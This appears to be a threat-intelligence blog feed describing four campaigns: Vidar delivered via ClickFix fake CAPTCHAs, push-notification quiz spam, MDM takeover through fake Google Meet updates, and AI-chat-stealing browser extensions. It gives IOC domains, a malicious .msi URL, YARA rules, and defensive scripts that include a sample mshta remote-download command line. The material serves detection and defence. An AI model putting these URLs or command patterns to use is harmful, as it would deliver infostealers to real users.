<tr>
<td><strong>T1059.007</strong></td>
<td>Command and Scripting Interpreter: JavaScript</td>
<td>The fake CAPTCHA pages utilize JS to facilitate the social engineering.</td>
</tr>
<tr>
<td><strong>T1005</strong></td>
<td>Data from Local System</td>
<td>Vidar targets local browser databases and wallet files.</td>
</tr>
<tr>
<td><strong>T1041</strong></td>
<td>Exfiltration Over C2 Channel</td>
<td>Stolen data is sent to attacker-controlled infrastructure.</td>
</tr>
</tbody></table>
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup has confirmed the following indicators as malicious. Security teams should monitor for any outbound traffic to these domains or execution patterns involving these URL structures.</p>
<h3>Confirmed Malicious Domains</h3>
<pre><code class="language-text">walwood[.]be
</code></pre>
<h3>Malicious URLs</h3>
<pre><code class="language-text">https://walwood[.]be/474a2b77/5ef46f21e2.msi
https://{compromised-website}/challenge/cf
https://{compromised-website}/474a2b77/5ef46f21e2.msi
</code></pre>
<h3>Detection Rules</h3>
<h4>YARA Rule: Vidar ClickFix Delivery Command</h4>
<p>This rule targets the specific command line arguments used to trigger the <code>mshta</code> download.</p>
<pre><code class="language-yara">rule Vidar_ClickFix_Delivery_Command {
    meta:
        description = "Detects the mshta command pattern used in ClickFix campaigns to download Vidar payloads"
        threat_name = "Vidar Infostealer"
        technique = "ClickFix / Fake CAPTCHA"
    strings:
        $mshta = "mshta" nocase
        $path = "/challenge/cf" ascii wide
        $protocol1 = "https://" ascii wide
        $protocol2 = "http://" ascii wide
    condition:
        $mshta and $path and ($protocol1 or $protocol2)
}
</code></pre>
<h4>YARA Rule: Fake Cloudflare Verification Page</h4>
<p>This rule identifies the source code of the malicious HTML landing pages.</p>
<pre><code class="language-yara">rule Fake_Cloudflare_Verification_ClickFix {
    meta:
        description = "Detects HTML/JS content of fake Cloudflare verification pages used for malware delivery"
        threat_name = "Vidar Infostealer"
    strings:
        $s1 = "Verifying you are human" ascii wide
        $s2 = "mshta" ascii wide
        $s3 = "/challenge/cf" ascii wide
        $s4 = "walwood.be" ascii wide
    condition:
        $s1 and ($s2 and $s3) or $s4
}
</code></pre>
<h2>SecLookup Detection</h2>
<p>The SecLookup threat intelligence platform was actively detecting and blocking the domains and infrastructure associated with this Vidar campaign prior to public disclosure. Our platform identified <code>walwood[.]be</code> as a malicious distribution point.</p>
<p>Subscribers to SecLookup’s feed were protected through automated updates to their DNS firewalls and EDR blocklists. Our continuous monitoring of compromised CMS environments allows us to provide early warning indicators for "ClickFix" campaigns, ensuring that SOC analysts can intercept these threats before a user manually executes the malicious payload.</p>
<h2>Recommendations</h2>
<p>To defend against Vidar and similar social engineering-led campaigns, SecLookup recommends the following actions:</p>
<ol>
<li><p><strong>Restrict Mshta Execution:</strong> Use Windows Attack Surface Reduction (ASR) rules or AppLocker to block or audit the execution of <code>mshta.exe</code> unless strictly required for business operations.</p>
</li>
<li><p><strong>User Education:</strong> Conduct specialized phishing training that highlights "ClickFix" tactics. Emphasize that legitimate services like Cloudflare or Google CAPTCHA will <em>never</em> ask a user to run a command or use the Windows Run dialog.</p>
</li>
<li><p><strong>Endpoint Monitoring:</strong> Configure EDR tools to alert on unusual parent-child process relationships, such as <code>browser.exe</code> (Chrome/Edge) spawning <code>cmd.exe</code>, <code>powershell.exe</code>, or <code>mshta.exe</code>.</p>
</li>
<li><p><strong>Network Filtering:</strong> Implement a robust DNS security solution to block access to known malicious domains and newly registered domains (NRDs) frequently used in these campaigns.</p>
</li>
<li><p><strong>Browser Security:</strong> Ensure browsers are kept up to date and consider implementing "Safe Browsing" policies that restrict interactions with unverified scripts.</p>
</li>
</ol>
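<p>Two of the detections above are easy to express over process-creation telemetry: <code>mshta.exe</code> being handed a remote URL rather than a local <code>.hta</code> file (the exact shape of the ClickFix command in this post), and a browser directly spawning a shell or LOLBin. The script below is an added example, not SecLookup or Malwarebytes code; it uses constructed events in a Sysmon-like shape (<code>Image</code>, <code>ParentImage</code>, <code>CommandLine</code>) and a placeholder host name in place of the post's <code>{compromised-website}</code>.</p>

```python
"""Flag ClickFix-style process activity in process-creation telemetry.

Added example; not from the post. The events are constructed in a
Sysmon-like shape and 'compromised-website.example' is a placeholder.
"""
from __future__ import annotations
import re
from pathlib import PureWindowsPath

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
LOLBINS = {"mshta.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
CLICKFIX_PATH = "/challenge/cf"  # path observed in this campaign (from the post)

def basename(image: str) -> str:
    """'C:\\Windows\\System32\\mshta.exe' -> 'mshta.exe' (works off-Windows too)."""
    return PureWindowsPath(image).name.lower()

def classify(event: dict) -> list[str]:
    """Return the names of every rule the event trips (empty list = nothing to see)."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    findings: list[str] = []
    # Rule 1: mshta.exe fetching a remote HTA instead of opening a local file.
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        findings.append("mshta_remote_url")
        if CLICKFIX_PATH in cmd.lower():
            findings.append("clickfix_challenge_cf_path")
    # Rule 2: the recommendation's parent/child check, browser -> shell or LOLBin.
    if parent in BROWSERS and image in LOLBINS:
        findings.append("browser_spawned_lolbin")
    return findings

def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, findings) for every event that trips at least one rule."""
    return [(i, f) for i, e in enumerate(events) if (f := classify(e))]

# Constructed events. A command pasted into Win+R runs under explorer.exe,
# so for this campaign it is rule 1 (the command line), not rule 2 (the
# parent), that fires; rule 2 covers lures that launch from the page itself.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://compromised-website.example/challenge/cf"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "chrome.exe"},
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["CommandLine"], "->", ", ".join(findings))
```

The local-file <code>mshta</code> launch in the second event is deliberately left unflagged: legitimate HTA use exists, and the signal in this campaign is the URL argument, not <code>mshta.exe</code> itself. If the ASR or AppLocker restriction from recommendation 1 is in place, the same command line shows up as a block event rather than a process start, and the rule can be pointed at that log instead.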
<h2>References</h2>
<ul>
<li><a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/hacked-sites-deliver-vidar-infostealer-to-windows-users">Hacked sites deliver Vidar infostealer to Windows users</a> by Malwarebytes Labs</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[The "Quiz" Deception: Push Notification Spam Campaign Targets Users via Browser Permissions]]></title><description><![CDATA[Executive Summary
A sophisticated social engineering campaign is currently exploiting user curiosity to hijack browser notification permissions. Threat actors are deploying deceptive quiz websites tha]]></description><link>https://blog.seclookup.com/the-quiz-deception-push-notification-spam-campaign-targets-users-via-browser-permissions</link><guid isPermaLink="true">https://blog.seclookup.com/the-quiz-deception-push-notification-spam-campaign-targets-users-via-browser-permissions</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Sat, 14 Mar 2026 09:00:12 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/aac38829-6d07-417c-b0ed-10abe23d5cbb.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>A sophisticated social engineering campaign is currently exploiting user curiosity to hijack browser notification permissions. Threat actors are deploying deceptive quiz websites that masquerade as harmless entertainment. Once a user engages with the "Start the Quiz" button, a deceptive overlay prompts them to enable browser notifications. By clicking "Allow," users inadvertently grant these sites permission to push unsolicited advertisements, affiliate links, and potentially malicious content directly to their desktop or mobile device, regardless of whether the user is actively browsing the site.</p>
<p>At SecLookup, our threat intelligence team has been actively monitoring this vector. We have confirmed that the domains identified in this campaign are malicious and are currently being blocked by our platform to protect our users from this intrusive adware technique.</p>
<h2>Threat Analysis</h2>
<h3>The Anatomy of the Deception</h3>
<p>The core of this attack vector relies on <strong>Social Engineering</strong> and the <strong>Browser Notifications API</strong>. Unlike traditional drive-by downloads that require a user to execute a file, this attack requires a binary interaction: a click.</p>
<ol>
<li><p><strong>Landing Page:</strong> The victim lands on a site that appears to be a legitimate quiz platform. The content varies but typically includes geography, vocabulary, history, or country-specific trivia (e.g., quizzes tailored for Canada, Germany, France, Japan, and the US).</p>
</li>
<li><p><strong>The Hook:</strong> The primary goal of the site is to maximize dwell time and engagement. The user is presented with a "Start the Quiz" button.</p>
</li>
<li><p><strong>The Trap:</strong> Upon clicking the button, the site overlays a prompt with a misleading background image. The text usually implies that clicking "Allow" is necessary to "continue" or "see the results."</p>
</li>
<li><p><strong>The Execution:</strong> This triggers the native browser prompt: "Allow [Domain] to send notifications?" The text inside the prompt often misleads the user, making it seem like a benign system request or an ad-blocker update, rather than a request for spam.</p>
</li>
</ol>
<h3>TTPs (Tactics, Techniques, and Procedures)</h3>
<p>This campaign aligns with several techniques observed in the <strong>MITRE ATT&amp;CK</strong> framework:</p>
<ul>
<li><p><strong>TA0001 - Initial Access: T1566.001 (Phishing: Fake Website):</strong> The actors use legitimate-looking domains to gain initial trust.</p>
</li>
<li><p><strong>T1193 (Spearphishing Link):</strong> While not strictly email-based, the mechanism mimics a trusted interaction.</p>
</li>
<li><p><strong>T1071.001 (Web Protocols: Web Traffic):</strong> The attack relies entirely on standard web traffic and browser APIs.</p>
</li>
<li><p><strong>T1546.015 (Event Triggered Execution - Web Browser API):</strong> The granting of notification permissions is a specific browser API trigger that allows the actor to push content into the user's environment, effectively bypassing the need for the user to visit the site again.</p>
</li>
</ul>
<h3>Economic Motivation</h3>
<p>Unlike ransomware campaigns that demand immediate ransoms, this threat actor is primarily motivated by <strong>Ad Revenue</strong> and <strong>Affiliate Schemes</strong>. By bombarding the user with persistent notifications, the attackers can generate clicks on affiliate links, display pay-per-click advertisements, or drive traffic to scam sites. This "Push Notification Spam" model is a low-effort, high-yield revenue stream for cybercriminals.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup's threat intelligence platform has scanned the domains identified in the Malwarebytes Labs report. The following domains have been confirmed malicious and should be blocked immediately:</p>
<h3>Domains</h3>
<pre><code class="language-text">quizcentral.co.in
yeqeso.org
uhuhedeb.org
navixzuno.co.in
edifaqe.org
quizcentral.co.za
triviabox.co.in
loopdeviceconnection.co.in
rixifabed.org
unsphiperidion.co.in
geniusfun.co.in
ylloer.org
</code></pre>
<p><em>Note: While the source article mentions a redirect chain involving</em> <code>unsphiperidion.co.in</code> <em>leading to a fake AdGuard update, the root domains listed above represent the primary infrastructure utilized in this campaign.</em></p>
<h2>SecLookup Detection</h2>
<p>SecLookup is actively detecting and blocking this threat. Our threat intelligence platform has verified the malicious nature of the domains listed above. We have updated our threat feeds to ensure that traffic to these specific domains is intercepted and blocked before it can reach user endpoints.</p>
<h2>Recommendations</h2>
<p>To mitigate the risk of falling victim to push notification spam campaigns, security professionals and end-users should implement the following measures:</p>
<h3>1. User Education and Policy</h3>
<p>Educate users on the dangers of the "Allow" prompt. Remind them that legitimate websites rarely ask for push notifications unless they are a messaging service (like WhatsApp) or a news outlet. Quiz sites are almost never a valid reason to grant this permission.</p>
<h3>2. Browser Configuration</h3>
<ul>
<li><p><strong>Review Notification Settings:</strong> Users should regularly check their browser settings (Chrome, Firefox, Edge) to review which sites have permission to send notifications. They should revoke access to any site they do not recognize.</p>
</li>
<li><p><strong>Disable by Default:</strong> Users can configure their browsers to block all notifications by default and only allow them when visiting a specific, trusted site.</p>
</li>
</ul>
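<p>Reviewing notification grants one profile at a time in the browser UI does not scale across a fleet, but the grants are stored on disk. The script below is an added example, not from the post or from Malwarebytes: it reads the notification exceptions from a Chromium-style <code>Preferences</code> file and splits the origins that hold an "allow" grant into ones on this post's IOC list and ones that merely need a human look. The file layout it assumes (<code>profile.content_settings.exceptions.notifications</code>, keys shaped like <code>https://host:443,*</code>, <code>setting</code> 1 for allow and 2 for block) is my reading of the Chromium format and should be checked against your browser version; the sample file content is constructed.</p>

```python
"""Audit which origins a Chromium-based browser may send notifications from.

Added example, not from the post. Assumes the Chromium 'Preferences'
JSON layout described in the lead-in (verify for your version); the
sample preferences below are constructed.
"""
from __future__ import annotations
import json
from urllib.parse import urlsplit

ALLOW, BLOCK = 1, 2  # Chromium content-setting values (assumed, see lead-in)

# The domains from this post's IOC section.
IOC_DOMAINS = {
    "quizcentral.co.in", "yeqeso.org", "uhuhedeb.org", "navixzuno.co.in",
    "edifaqe.org", "quizcentral.co.za", "triviabox.co.in",
    "loopdeviceconnection.co.in", "rixifabed.org", "unsphiperidion.co.in",
    "geniusfun.co.in", "ylloer.org",
}

# Constructed stand-in for a user's Preferences file.
SAMPLE_PREFERENCES = json.dumps({
    "profile": {"content_settings": {"exceptions": {"notifications": {
        "https://quizcentral.co.in:443,*": {"setting": ALLOW},
        "https://mail.example.com:443,*": {"setting": ALLOW},
        "https://news.example.org:443,*": {"setting": BLOCK},
        "https://www.ylloer.org:443,*": {"setting": ALLOW},
    }}}}
})

def pattern_host(pattern: str) -> str:
    """'https://host:443,*' -> 'host': drop the secondary pattern and the port."""
    primary = pattern.split(",")[0]
    host = urlsplit(primary).hostname or primary
    return host.lower()

def in_ioc_list(host: str, iocs: set[str]) -> bool:
    """True if `host` is an IOC domain or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in iocs)

def notification_grants(preferences_json: str) -> list[str]:
    """Return every host that currently holds an ALLOW grant for notifications."""
    prefs = json.loads(preferences_json)
    exceptions = (prefs.get("profile", {}).get("content_settings", {})
                       .get("exceptions", {}).get("notifications", {}))
    return sorted(pattern_host(p) for p, v in exceptions.items()
                  if v.get("setting") == ALLOW)

def audit(preferences_json: str, iocs: set[str] = IOC_DOMAINS) -> dict[str, list[str]]:
    """Split granted hosts into known-bad (on the IOC list) and review-needed."""
    granted = notification_grants(preferences_json)
    return {
        "known_bad": [h for h in granted if in_ioc_list(h, iocs)],
        "review": [h for h in granted if not in_ioc_list(h, iocs)],
    }

if __name__ == "__main__":
    # Real use: pass the contents of <profile dir>/Preferences instead.
    print(json.dumps(audit(SAMPLE_PREFERENCES), indent=2))
```

For the "disable by default" step, managed Chrome and Edge expose this as the <code>DefaultNotificationsSetting</code> enterprise policy (value 2 blocks prompts fleet-wide), which removes the "Allow" click from the picture entirely and leaves the audit above for exceptions you have explicitly granted.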
<h3>3. Use of Ad-Blockers</h3>
<p>Utilizing content blockers (such as uBlock Origin or AdGuard) can often mitigate these attacks by preventing the deceptive overlay from rendering, thereby stopping the "Click Allow" interaction.</p>
<h3>4. Endpoint Protection</h3>
<p>Ensure that Endpoint Detection and Response (EDR) solutions are configured to alert on browser process anomalies or unexpected outbound traffic to known ad-tech domains.</p>
<h2>References</h2>
<ul>
<li><a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/quiz-sites-trick-users-into-enabling-unwanted-browser-notifications">Quiz sites trick users into enabling unwanted browser notifications</a> by Malwarebytes Labs, 2026-03-09.</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Silent Takeover: How a Fake Google Meet Update Hijacks Windows Devices via MDM Enrollment]]></title><description><![CDATA[Executive Summary
A sophisticated yet deceptive phishing campaign is currently targeting Windows users by exploiting the operating system's native device management capabilities. Rather than stealing ]]></description><link>https://blog.seclookup.com/silent-takeover-how-a-fake-google-meet-update-hijacks-windows-devices-via-mdm-enrollment</link><guid isPermaLink="true">https://blog.seclookup.com/silent-takeover-how-a-fake-google-meet-update-hijacks-windows-devices-via-mdm-enrollment</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Sat, 14 Mar 2026 08:59:26 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/205f290a-a087-4b2b-bbbd-698ffa53b543.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>A sophisticated yet deceptive phishing campaign is currently targeting Windows users by exploiting the operating system's native device management capabilities. Rather than stealing credentials or downloading malicious files, threat actors are leveraging a legitimate Windows URI scheme (<code>ms-device-enrollment</code>) to silently enroll victims' computers into an attacker-controlled Mobile Device Management (MDM) server.</p>
<p>By impersonating a Google Meet update notification, the attackers bypass traditional web-based defenses. The campaign relies on a "trust the process" social engineering tactic; once a user clicks "Update now," Windows bypasses the browser interface and launches a native system dialog. If the victim proceeds through the wizard, they unwittingly grant the attacker full administrative control over their machine, including the ability to install applications, enforce security policies, and wipe the device remotely. SecLookup’s threat intelligence team has identified and is actively blocking these malicious domains to prevent unauthorized device takeovers.</p>
<h2>Threat Analysis</h2>
<h3>The Vector: <code>ms-device-enrollment</code> URI Scheme</h3>
<p>The core of this attack lies in the abuse of the <code>ms-device-enrollment:</code> URI scheme. This is a built-in Windows protocol designed for enterprise environments, allowing IT administrators to send a single link to a user that automatically opens the "Set up a work or school account" dialog. While this feature is legitimate for corporate provisioning, it creates a dangerous vector when weaponized.</p>
<p>When a user clicks the update button on the phishing page, the link does not navigate to a website. The browser hands the <code>ms-device-enrollment:</code> deep link to the Windows shell, which opens the native "Set up a work or school account" dialog with the account name and enrollment server pre-filled from the link's query string. Web proxies and URL filters see the click on the phishing page, not the OS protocol handler being invoked, so they cannot block the prompt from appearing. What they can still see, and block, is the enrollment traffic that follows from the device to the MDM server named in the link, which is why the server domain is the most useful network control in this campaign.</p>
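<p>The one field a user is asked to check by eye in this attack is the server name inside the deep link, and that check can be made mechanical. The following Python is an added example, not code from the original post, from Malwarebytes or from SecLookup: it pulls <code>ms-device-enrollment:</code> links out of a saved page or proxy capture, parses the <code>mode</code>, <code>username</code> and <code>servername</code> parameters that Microsoft documents for this URI, and flags any link whose server is not on the organisation's own MDM allowlist. The sample HTML and the allowlist host <code>mdm.example.com</code> are constructed for the example; only the attacker server name comes from this report.</p>

```python
import re
from html import unescape
from urllib.parse import parse_qs, urlsplit

# Constructed sample page fragment (not the real phishing page): one link to a
# hypothetical organisation's own MDM, one to the attacker server named in this report.
SAMPLE_HTML = """
<a href="ms-device-enrollment:?mode=mdm&username=jane.doe%40example.com&servername=https%3A%2F%2Fmdm.example.com">Set up work account</a>
<a class="btn" href="ms-device-enrollment:?mode=mdm&username=collinsmckleen%40sunlife-finance.com&servername=https%3A%2F%2Ftnrmuv-api.esper.cloud">Update now</a>
"""

# Assumption: the only enrollment server(s) this organisation operates.
ALLOWED_MDM_HOSTS = frozenset({"mdm.example.com"})

HREF_RE = re.compile(r'href\s*=\s*"(ms-device-enrollment:[^"]*)"', re.IGNORECASE)


def parse_enrollment_link(link: str) -> dict:
    """Split an ms-device-enrollment: deep link into mode, username and server host.

    Microsoft documents the form ms-device-enrollment:?mode=mdm&username=...&servername=...
    The servername value may be a full URL or a bare host, so it is normalised to a hostname.
    """
    if not link.lower().startswith("ms-device-enrollment:"):
        raise ValueError("not an ms-device-enrollment link")
    query = link.partition("?")[2]
    params = {k.lower(): v[0] for k, v in parse_qs(query).items()}
    server = params.get("servername", "")
    if server and "://" not in server:
        server = "https://" + server
    return {
        "mode": params.get("mode", "").lower(),
        "username": params.get("username", ""),
        "server_host": (urlsplit(server).hostname or "").lower(),
    }


def triage_enrollment_links(page: str, allowed_hosts=ALLOWED_MDM_HOSTS) -> list:
    """Return one finding per deep link found in page, with an allowed/suspicious verdict.

    Anything that is not one of our own enrollment hosts is suspicious, including a
    missing servername (the wizard would then ask the user to type one in).
    """
    findings = []
    for raw in HREF_RE.findall(page):
        link = unescape(raw)  # hrefs in real pages usually carry &amp; rather than &
        info = parse_enrollment_link(link)
        info["link"] = link
        info["verdict"] = "allowed" if info["server_host"] in allowed_hosts else "suspicious"
        findings.append(info)
    return findings


if __name__ == "__main__":
    for f in triage_enrollment_links(SAMPLE_HTML):
        print(f"{f['verdict']:<10} server={f['server_host'] or '-'}  user={f['username']}")
```

<p>Point it at saved copies of suspicious pages or at URL fields in proxy logs. The only decision it makes is whether <code>servername</code> resolves to a host you operate; a link that enrolls into someone else's tenant is the whole attack, whatever the username says.</p>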
<h3>Social Engineering and Trust Exploitation</h3>
<p>The social engineering in this campaign is deceptively simple but highly effective. The page is meticulously designed to mimic the visual identity of Google Meet, utilizing the correct color palette and branding. The prompt reads, "To keep using Meet, install the latest version." This creates a false sense of urgency and authority.</p>
<p>Crucially, the attackers do not attempt to perfect the impersonation of the victim's identity. The username field in the pre-populated dialog reads <code>collinsmckleen@sunlife-finance.com</code> (impersonating the corporate domain Sun Life Financial). However, the goal is not credential theft; it is device theft. The attacker's goal is to get the user to click through the trusted Windows workflow. Once the user clicks "Next" and accepts the enrollment, their machine becomes a managed device under the attacker's MDM server.</p>
<h3>TTPs and MITRE ATT&amp;CK Mapping</h3>
<p>This campaign exhibits several TTPs that map to the MITRE ATT&amp;CK framework:</p>
<ul>
<li><p><strong>T1566.001 (Phishing: Spearphishing Link):</strong> The attackers use a link disguised as an update to lure the victim into clicking.</p>
</li>
<li><p><strong>T1204.001 (User Execution: Malicious Link):</strong> Nothing is exploited. The victim clicks the disguised link and then clicks through the native enrollment wizard, and that is all the attacker needs.</p>
</li>
<li><p><strong>T1072 (Software Deployment Tools):</strong> MDM is a management platform, and enrollment hands the attacker that platform's powers over the device: installing software, pushing configuration and policy, and wiping it. This, rather than any persistence sub-technique, is the closest match for what <code>ms-device-enrollment</code> abuse gives the actor.</p>
</li>
<li><p><strong>T1059.001 (Command and Scripting Interpreter: PowerShell):</strong> Not observed in this report, but an MDM that controls a device can push scripts and installers, so follow-on PowerShell execution is the expected next step once enrollment completes.</p>
</li>
</ul>
<p>The severity lies in what the attacker does not need: no exploit, no shell access, no stolen password. The victim grants management rights through Windows' own enrollment workflow.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup’s telemetry has confirmed the following malicious entities associated with this campaign. Security teams should immediately block these assets to prevent device enrollment.</p>
<h3>Malicious Domains</h3>
<pre><code class="language-text">updatemeetmicro[.]online
tnrmuv-api.esper[.]cloud
</code></pre>
<h3>Email Addresses</h3>
<pre><code class="language-text">collinsmckleen@sunlife-finance.com
sendpoint@tnrmuv-api.esper.cloud
</code></pre>
<h2>SecLookup Detection</h2>
<p>SecLookup’s threat intelligence platform has been actively monitoring for this specific campaign. We have successfully detected and blocked the following malicious domains:</p>
<ul>
<li><p><strong>updatemeetmicro.online:</strong> This domain hosts the phishing landing page. Our systems have flagged it as malicious based on recent association with phishing campaigns targeting Google Workspace users.</p>
</li>
<li><p><strong>tnrmuv-api.esper.cloud:</strong> This endpoint acts as the management server receiving the enrollment requests. It has been blacklisted to prevent the establishment of the MDM connection.</p>
</li>
</ul>
<p>Our monitoring confirms that the <code>updatemeetmicro.online</code> domain returns a standard HTTP 200 response but is used solely for social engineering purposes. We are actively blocking traffic to this domain to protect SecLookup users from falling victim to this device takeover attack.</p>
<h2>Recommendations</h2>
<p>To defend against this type of "silent takeover" attack, organizations must adjust their security posture to include OS-level awareness.</p>
<ol>
<li><p><strong>Implement OS-Level Controls:</strong> Network filters cannot see a protocol handler being launched, so this control belongs on the endpoint. Configure endpoint detection and response (EDR) to alert when a browser process opens an <code>ms-device-enrollment:</code> URI, and on devices that should never be enrolled outside your own tenant, the Group Policy setting "Disable MDM Enrollment" (Computer Configuration &gt; Administrative Templates &gt; Windows Components &gt; MDM) stops the wizard from completing an enrollment at all.</p>
</li>
<li><p><strong>Train on Native Dialogs:</strong> Educate users that they should never click "Update" buttons in browser windows, regardless of how official they look. If a browser attempts to open a native Windows dialog for device enrollment, users should verify the "Server" or "Account" fields manually. In this campaign, the server field pointed to an external domain (<code>tnrmuv-api.esper.cloud</code>) rather than a legitimate corporate domain.</p>
</li>
<li><p><strong>Control Where Devices Can Enroll:</strong> This attack needs no certificate trickery; it relies on Windows accepting whatever server the link names. Keep a short, documented list of your official MDM enrollment URLs, allow only those at the DNS and proxy layer where your environment permits it, and train users to recognise what a genuine prompt from your IT department looks like so that an unfamiliar server name in the dialog is itself the warning.</p>
</li>
<li><p><strong>Block Suspicious Domains:</strong> Ensure your DNS filtering and firewall rules include the blocked domains listed in the IOCs section above.</p>
</li>
</ol>
<h2>References</h2>
<ul>
<li><a href="https://www.malwarebytes.com/blog/threat-intel/2026/03/one-click-on-this-fake-google-meet-update-can-give-attackers-control-of-your-pc">One click on this fake Google Meet update can give attackers control of your PC</a>, Malwarebytes Labs, March 6, 2026.</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Impersonating Productivity: Malicious AI Extensions Targeting Enterprise Chat Histories]]></title><description><![CDATA[Executive Summary
The rapid integration of Large Language Models (LLMs) into the daily workflow of knowledge workers has created a new attack surface for cybercriminals. In a significant escalation of]]></description><link>https://blog.seclookup.com/impersonating-productivity-malicious-ai-extensions-targeting-enterprise-chat-histories</link><guid isPermaLink="true">https://blog.seclookup.com/impersonating-productivity-malicious-ai-extensions-targeting-enterprise-chat-histories</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[SecLookup]]></category><category><![CDATA[ioc]]></category><category><![CDATA[cybersecurity]]></category><dc:creator><![CDATA[Seclookup]]></dc:creator><pubDate>Sat, 14 Mar 2026 08:58:26 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/69908c0c8cb80c8fad740eaa/d85cc740-c6a5-47bd-9240-4bab95a48721.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>The rapid integration of Large Language Models (LLMs) into the daily workflow of knowledge workers has created a new attack surface for cybercriminals. In a significant escalation of supply chain attacks targeting the browser ecosystem, Microsoft Defender Security Research has uncovered a campaign involving malicious Chromium-based browser extensions. These extensions impersonate legitimate AI assistant tools to harvest sensitive LLM chat histories and browsing data.</p>
<p>Reports indicate that these deceptive extensions have achieved a massive scale, with approximately 900,000 installs and active telemetry across more than 20,000 enterprise tenants. By exploiting user trust in productivity tools and utilizing automated distribution channels in agentic browsers, the threat actors have embedded a persistent data collection mechanism directly into the browser environments of corporate users. This post details the attack chain, the risks associated with LLM data exfiltration, and the specific Indicators of Compromise (IOCs) SecLookup is actively blocking.</p>
<h2>Threat Analysis</h2>
<p>The core of this campaign relies on <strong>Impersonation</strong> and <strong>Supply Chain Compromise</strong>, leveraging the growing dependency on AI sidebars and agentic browsing tools. To understand the full impact, we must analyze the tactics, techniques, and procedures (TTPs) employed by the threat actors.</p>
<h3>Attack Vector: The AI Sidebar Ecosystem</h3>
<p>The primary delivery mechanism for this threat is the browser extension marketplace and the emerging ecosystem of "agentic browsers." These are environments designed to assist users in interacting with AI models directly within their browsing sessions.</p>
<ul>
<li><p><strong>TTP: Masquerading (T1036.005, Match Legitimate Name or Location)</strong> The extensions carry names and descriptions chosen to look like legitimate AI productivity tools. Because Chromium-based browsers such as Google Chrome and Microsoft Edge share one extension architecture, a single package installs on all of them with no extra work, and the visual resemblance to trusted tools lowers the scrutiny users apply at install time.</p>
</li>
<li><p><strong>TTP: Supply Chain Compromise (T1195)</strong> Unlike traditional phishing attacks that rely on social engineering, this campaign leverages automated distribution. The threat actors targeted agentic browsers that automatically download extensions without requiring explicit user approval. This technique allows the malicious code to bypass the initial gatekeeper (the user) and establish a foothold in the target environment immediately upon the user's first interaction with the AI tool.</p>
</li>
</ul>
<h3>Persistence and Permission Abuse</h3>
<p>Once installed, these extensions do not behave like typical malware. They persist as part of the browser profile and run in every session, with no separate process, service or scheduled task for an endpoint agent to notice.</p>
<ul>
<li><strong>TTP: Software Extensions: Browser Extensions (T1176.001)</strong> To function, the extensions request broad host permissions, which the browser presents as "Read and change all your data on the sites you visit". Knowledge workers grant this for convenience, and with that grant a content script can read the DOM of the LLM chat page, read its <code>localStorage</code> (where chat front-ends often cache conversation state), and, with the <code>tabs</code> permission, enumerate the URLs open across the session.</li>
</ul>
<h3>Data Exfiltration and Impact</h3>
<p>The true danger lies in what the extensions collect. The threat actors are harvesting full URLs and the content of AI chat sessions from platforms such as ChatGPT and DeepSeek.</p>
<p>For an enterprise, this represents a critical data breach vector. The data harvested is not generic; it includes:</p>
<ul>
<li><p><strong>Proprietary Code:</strong> Snippets of code being debugged or written.</p>
</li>
<li><p><strong>Internal Workflows:</strong> Step-by-step processes shared between employees.</p>
</li>
<li><p><strong>Strategic Discussions:</strong> Sensitive business intelligence and decision-making logs.</p>
</li>
</ul>
<p>By exfiltrating this data, the threat actors gain access to the intellectual property and strategic direction of the organization, turning a seemingly trusted productivity utility into a sophisticated surveillance tool.</p>
<h2>Indicators of Compromise (IOCs)</h2>
<p>SecLookup's threat intelligence team has identified and verified the following malicious domains associated with this campaign. These domains are confirmed to be hosting the malicious extension packages or acting as C2 infrastructure.</p>
<h3>Domains</h3>
<pre><code class="language-text">chataigpt[.]pro
chatgptsidebar[.]pro
</code></pre>
<h2>SecLookup Detection</h2>
<p>SecLookup is actively monitoring the threat landscape to protect our users from this specific campaign. Our threat intelligence platform has confirmed the malicious nature of the domains listed above.</p>
